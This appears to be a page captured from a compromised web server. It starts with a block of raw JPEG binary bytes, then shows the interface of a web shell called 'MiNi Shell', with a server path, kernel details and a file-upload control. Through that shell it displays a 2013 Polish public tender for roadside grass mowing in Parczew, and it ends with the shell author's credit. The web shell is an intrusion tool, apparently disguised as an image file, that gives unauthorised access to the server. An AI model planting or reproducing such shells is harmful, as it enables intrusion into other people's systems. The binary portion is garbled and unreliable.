JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130129/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130129/39344-N-2013.html

<p class="kh_header"><b>Parczew: Usługi związane z koszeniem trawy, chwastów, samosiewów i odrostów oraz utrzymaniem czystości/porządku w obrębie pasa drogowego w ciągu dróg wojewódzkich administrowanych przez RDW w Parczewie</b><br>
<b>Numer ogłoszenia: 39344 - 2013; data zamieszczenia: 29.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Lublinie Rejon Dróg Wojewódzkich w Parczewie , ul. Wojska Polskiego 21, 21-200 Parczew, woj. lubelskie, tel. 083 3542314, faks 083 3541694.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi związane z koszeniem trawy, chwastów, samosiewów i odrostów oraz utrzymaniem czystości/porządku w obrębie pasa drogowego w ciągu dróg wojewódzkich administrowanych przez RDW w Parczewie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są: Usługi związane z koszeniem trawy, chwastów, samosiewów i odrostów oraz utrzymaniem czystości/porządku w obrębie pasa drogowego w ciągu dróg wojewódzkich administrowanych przez RDW w Parczewie na terenie:
	1) Obwodu Drogowego Nr 1 w Parczewie - ZADANIE Nr 1,
	2) Obwodu Drogowego Nr 2 w Ostrowie Lubelskim - ZADANIE Nr 2,
zgodnie z wymaganiami określonymi w załączonej Specyfikacji Technicznej, w sposób gwarantujący należytą jakość.
2.Maksymalna ilość usług wynosi (długość określona jednostronnie w km):
	1) na terenie Obwodu Drogowego Nr 1 w Parczewie:
           a)  I i III koszenie przy szerokości 2,5 m - 313,39 km,
           b)  II koszenie:
	      - przy średniej szerokości 4 ÷ 6 m - 189,86 km,
              -	przy średniej szerokości 10 ÷ 12 m - 123,53 km,
       2) na terenie Obwodu Drogowego Nr 2 w Ostrowie Lubelskim:
          a)  I i III koszenie przy szerokości 2,5 m - 241,26 km,
          b)  II koszenie przy średniej szerokości 4 ÷ 6 m - 241,26 km.
Zamawiający zastrzega sobie możliwość zmniejszenia zakresu zamówienia.
3. Zakres usług obejmuje:
   a)	koszenie pierwsze i trzecie - wykoszenie traw i chwastów  w obrębie
        korpusu drogi (pobocze i skarpa - na szerokości 2,5 m od krawędzi jezdni),
   b) koszenie drugie - wykoszenie traw, chwastów, samosiewów i odrostów w pasie
       drogowym o zmiennej szerokości (z uprzątnięciem wyciętych samosiewów i   
       odrostów),
   c) ponadto przy każdym koszeniu: - oznakowanie miejsca prowadzonych prac na
       podstawie sporządzonego we własnym zakresie, zgodnie z obowiązującymi
       przepisami projektu tymczasowej organizacji ruchu (na czas prowadzonych
       usług) i zatwierdzonego przez Zarządzającego ruchem na drogach 
       wojewódzkich,    tj. Dyrektora ZDW w Lublinie, czynności przygotowawcze,
       tj. usunięcie obcych zanieczyszczeń (kamienie, gruz, puszki metalowe, itp.)
       z miejsca pracy kosiarki oraz ich wywóz na składowisko odpadów, wykoszenie
       wlotów skrzyżowań z drogami o nawierzchni bitumicznej na długości 20 m 
       i szerokości 1,5 m,
     - ręczne wykoszenie traw w miejscach niedostępnych, tj. przy urządzeniach
      drogowych (słupki znaków drogowych, słupki prowadzące, bariery ochronne itp.).
      Na odcinkach dróg z ustawionymi barierami zakres usług obejmuje również ręczne
      koszenie poza barierami do wymaganej szerokości j.w. 
     - usunięcie wszelkich obcych zanieczyszczeń (kamienie, gruz, puszki metalowe,
       itp.) po wykoszeniu traw oraz ich wywóz na składowisko odpadów.
4. Zamawiający dopuszcza możliwość składania ofert częściowych na poszczególne
   zadania z zachowaniem pełnego zakresu usług.
5. Zamawiający nie przewiduje udzielania zamówień uzupełniających.
6. Zgodnie z art. 30 ust. 4 ustawy Pzp, Zamawiający dopuszcza rozwiązania
   równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania
   równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że
   oferowane przez niego usługi spełniają wymagania określone przez Zamawiającego
  (art. 30, ust. 5 ustawy). Za rozwiązanie równoważne uznana będzie oferta na 
  wykonanie usług przy użyciu jednostek sprzętowych innych niż określone    
  w Specyfikacji technicznej, pod warunkiem, że ich parametry będą nie gorsze niż
  określone w ST.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.20.00-0, 90.51.13.00-5, 90.51.20.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości    
   3.000,00  zł (słownie złotych: trzy tysiące 00/100) za każde oferowane zadanie.  
2. Wadium może być wnoszone w jednej lub kilku następujących formach zgodnie
   z art. 45, ust. 6 ustawy Prawo zamówień publicznych:
   1)	pieniądzu;
   2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy   
     oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem 
     pieniężnym;
   3) Gwarancjach bankowych;
   4) Gwarancjach ubezpieczeniowych;
   5) Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2
    ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju 
    Przedsiębiorczości (tj. Dz. U. z 2007 r. Nr 42 poz. 275, z późn. zm.).
3. Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto ZDW  
    w Lublinie w Kredyt Banku S.A. O/Lublin nr 89 1500 1520 1215 2004 1596 0000.
4. W ofercie należy złożyć dokument potwierdzający wniesienie wadium.
UWAGA:
1. Wadium w pieniądzu należy wnosić ściśle z dyspozycją art. 45 ust. 7 ustawy
   Prawo zamówień publicznych, tzn.(przelewem na rachunek bankowy wskazany
   przez zamawiającego). W myśl art. 63. ust. 3 pkt.1 ustawy Prawo bankowe z dnia 
   29 sierpnia 1997r. (tj. Dz. U z 2012 poz. 1376) polecenie przelewu jest jedną 
   z form rozliczenia bezgotówkowego. Zgodnie z art. 63c Prawa bankowego polecenie
   przelewu stanowi udzieloną bankowi dyspozycję dłużnika obciążenia jego rachunku 
   określoną kwotą i uznania tą kwotą rachunku wierzyciela. Oznacza to, że wpłata
   gotówkowa wadium wnoszona na poczcie lub w banku nie stanowi polecenia 
   przelewu w rozumieniu wyżej cytowanych artykułów.
2. Wadium wnoszone przelewem (art. 45 ust. 7 ustawy pzp) uważa się za wniesione
   w terminie jeżeli wpłynie na konto ZDW w Lublinie przed upływem terminu składania
   ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunków udziału:
1. Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia 
   Wykonawca winien wykonać (a w przypadku świadczeń okresowych lub ciągłych
   również wykonywać)  w okresie ostatnich 3 lat przed upływem terminu składania 
   ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 1
   usługę polegającą na koszeniu traw, chwastów, samosiewów i odrostów w obrębie pasa
   drogowego, której wartość wyniosła co najmniej 100 tys. zł  brutto dla każdego oferowanego zadania.
2. W przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym
   do wykonania zamówienia innych podmiotów Zamawiający żąda dołączenia do oferty
   pisemnego zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych
   zasobów na okres korzystania z nich przy wykonaniu zamówienia. Przez pisemne
   zobowiązanie podmiotu trzeciego rozumie się oryginał zobowiązania lub kserokopię
   zobowiązania poświadczoną, za zgodność z oryginałem przez ten podmiot (zgodnie z
  wyrokami KIO nr: KIO 786/11, KIO 787/11, KIO 797/11, KIO 830/11, KIO 1008/11).
UWAGA!
1) W przypadku gdy Wykonawca polega na zasobach innych podmiotów jego obowiązkiem
   jest udowodnienie, że rzeczywiście będzie dysponował wskazanymi zasobami w czasie
   realizacji zamówienia. W szczególności dotyczy to udostępnienia wiedzy i doświadczenia 
   przez podmiot trzeci. W takim przypadku dla wykazania faktycznego dysponowania 
   odpowiednią wiedzą i doświadczeniem podmiotu trzeciego przy realizacji zamówienia
   niezbędne może być powołanie się na udział podmiotu trzeciego w wykonywaniu
   zamówienia. (PRAWO ZAMÓWIEŃ PUBLICZNYCH PO ZMIANACH z 2009 r. pod redakcją 
   Jacka Sadowego).
2) Zobowiązanie podmiotu trzeciego do oddania Wykonawcy do dyspozycji niezbędnych
    zasobów winno posiadać formę pisemną, stosowną treść, z której będzie wynikało, że
    podmiot ten zobowiązał się do udostępnienia określonych zasobów na okres korzystania 
    z nich przy wykonaniu zamówienia oraz dla swej skuteczności musi zostać złożone przez
   osobę/osoby uprawnione do reprezentowania podmiotu trzeciego w powyższym zakresie.
  Zobowiązanie złożone przez osobę nieuprawnioną nie dowodzi udostępnienia zasobu przez
   podmiot trzeci (zgodnie z wyrokiem KIO2213/11).
3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w/w warunki
   udziału mogą być spełnione łącznie.
4. Ocena spełniania warunków będzie dokonywana w następujący sposób: spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Na potwierdzenie spełniania warunku dysponowania odpowiednim potencjałem technicznym Wykonawca winien dysponować jednostkami sprzętowymi wymienionymi poniżej w ilości minimum dla 1 zadania:
   1) Kosiarka bijakowa doczepna (wraz z nośnikiem) lub samojezdna - 2 szt.,
   2) Wykaszarki -	3 szt
   3) Rębak do cięcia odrostów i samosiewów -1 szt.,
   4) Ciągnik rolniczy z przyczepą lub samochód ciężarowy -	1 szt.
2. W przypadku, gdy Wykonawca polega na potencjale technicznym do wykonania
   zamówienia innych podmiotów Zamawiający żąda dołączenia do oferty pisemnego
   zobowiązania tych podmiotów  do oddania mu do dyspozycji niezbędnych zasobów na okres
   korzystania z nich przy wykonaniu zamówienia. Przez pisemne zobowiązanie podmiotu
   trzeciego rozumie się oryginał zobowiązania lub kserokopię zobowiązania poświadczoną, za
   zgodność z oryginałem przez ten podmiot (zgodnie z wyrokami KIO nr: KIO 786/11,
   KIO 787/11, KIO 797/11, KIO 830/11, KIO 1008/11).
UWAGA!
1) W przypadku gdy Wykonawca polega na zasobach innych podmiotów jego obowiązkiem
   jest udowodnienie, że rzeczywiście będzie dysponował wskazanymi zasobami w czasie 
   realizacji zamówienia. 
2) Zobowiązanie podmiotu trzeciego do oddania Wykonawcy do dyspozycji niezbędnych
   zasobów winno posiadać formę pisemną, stosowną treść, z której będzie wynikało, że
   podmiot ten zobowiązał się do udostępnienia określonych zasobów na okres korzystania 
   z nich przy wykonaniu zamówienia oraz dla swej skuteczności musi zostać złożone przez
   osobę/osoby uprawnione do reprezentowania podmiotu trzeciego w powyższym zakresie.
   Zobowiązanie złożone przez osobę nieuprawnioną nie dowodzi udostępnienia zasobu przez
   podmiot trzeci (zgodnie z wyrokiem KIO2213/11).
3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w/w warunki
    udziału mogą być spełnione łącznie.
4. Ocena spełniania warunków będzie dokonywana w następujący sposób: spełnia /nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Dowód wniesienia wadium.
2) Ofertę przetargową - z ceną netto i z podatkiem VAT dla każdego zadania oddzielnie wraz z Formularzem Cenowym 
3) Wykaz części zamówienia, których wykonanie Wykonawca zamierza zlecić podwykonawcy 
4) W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do oferty należy załączyć dokument
   (np.odpowiednią umowę) ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo
   reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art. 23 ust. 1 i 2 ustawy
   Prawo zamówień publicznych.
5) W przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które nie są wymienione w odpisie z właściwego 
    rejestru albo zaświadczeniu o wpisie do ewidencji działalności gospodarczej, do oferty należy załączyć dokument 
    potwierdzający prawo do reprezentowania podmiotu przez osobę/osoby podpisujące ofertę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje
możliwość dokonania zmian postanowień umowy w stosunku do treści oferty, polegających na zmianie wynagrodzenia, w przypadku gdy zmianie ulegnie stawka podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> zdw.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można uzyskać w RDW w Parczewie lok. 19 lub za zaliczeniem pocztowym - koszt 8,00 zł oraz bezpłatnie pocztą elektroniczną po przesłaniu zamówienia na adres: rdw.parczew.dzp@zdw.lublin.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.02.2013 godzina 10:00, miejsce: Rejon Dróg Wojewódzkich w Parczewie, ul. Wojska Polskiego 21, pok. nr 19. dnia 07.02.2013 r.
Oferty zostaną otwarte w siedzibie Zamawiającego pok. nr 12 w dniu 07.02.2013 r. o godz.10:30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują faksem lub drogą elektroniczną. Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
Osoby uprawnione do porozumiewania się z Wykonawcami: 	inż. Jadwiga Graniak, mgr inż. Roman Kopeć, 
lok. 19 w godz. 07:00 - 15:00, tel. (83) 354-23-14.   
Uwaga: Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej Zamawiającego lub w inny sposób i zamierzają ubiegać się o udzielenie zamówienia, mogą przesłać Zamawiającemu krótką informację zawierającą podstawowe dane firmy (nazwa, adres, nr telefonu i faksu, adres poczty elektronicznej) faksem nr 83 3541694 lub pocztą elektroniczną na adres rdw.parczew.dzp@zdw.lublin.pl. 
Wykonawcy, którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez Zamawiającego indywidualnie (bezpośrednio) zawiadamiani o np.: zapytaniach, wyjaśnieniach i zmianach dotyczących specyfikacji istotnych warunków zamówienia, zwołaniu przez Zamawiającego zebrania wszystkich Wykonawców, przedłużeniu terminu składania ofert.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi związane z koszeniem trawy, chwastów, samosiewów i odrostów oraz utrzymaniem czystości/porządku w obrębie pasa drogowego w ciągu dróg wojewódzkich na terenie Obwodu Drogowego Nr 1 w Parczewie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Maksymalna ilość usług wynosi (długość określona jednostronnie w km):
a) I i III koszenie przy szerokości 2,5 m - 313,39 km,
b) II koszenie: - przy średniej szerokości 4 ÷ 6 m - 189,86 km,
   - przy średniej szerokości 10 ÷ 12 m - 123,53 km.
Zamawiający zastrzega sobie możliwość zmniejszenia zakresu zamówienia. Wartość zamówienia : 161.636,20 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.20.00-0, 90.51.13.00-5, 90.51.20.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi związane z koszeniem trawy, chwastów, samosiewów i odrostów oraz utrzymaniem czystości/porządku w obrębie pasa drogowego w ciągu dróg wojewódzkich na terenie Obwodu Drogowego Nr 2 w Ostrowie Lubelskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Maksymalna ilość usług wynosi (długość określona jednostronnie w km):
a)  I i III koszenie przy szerokości 2,5 m - 241,26 km,
b) II koszenie: - przy średniej szerokości 4 ÷ 6 m - 241,26 km.
Zamawiający zastrzega sobie możliwość zmniejszenia zakresu zamówienia. Wartość zamówienia : 120.630,00 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.20.00-0, 90.51.13.00-5, 90.51.20.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com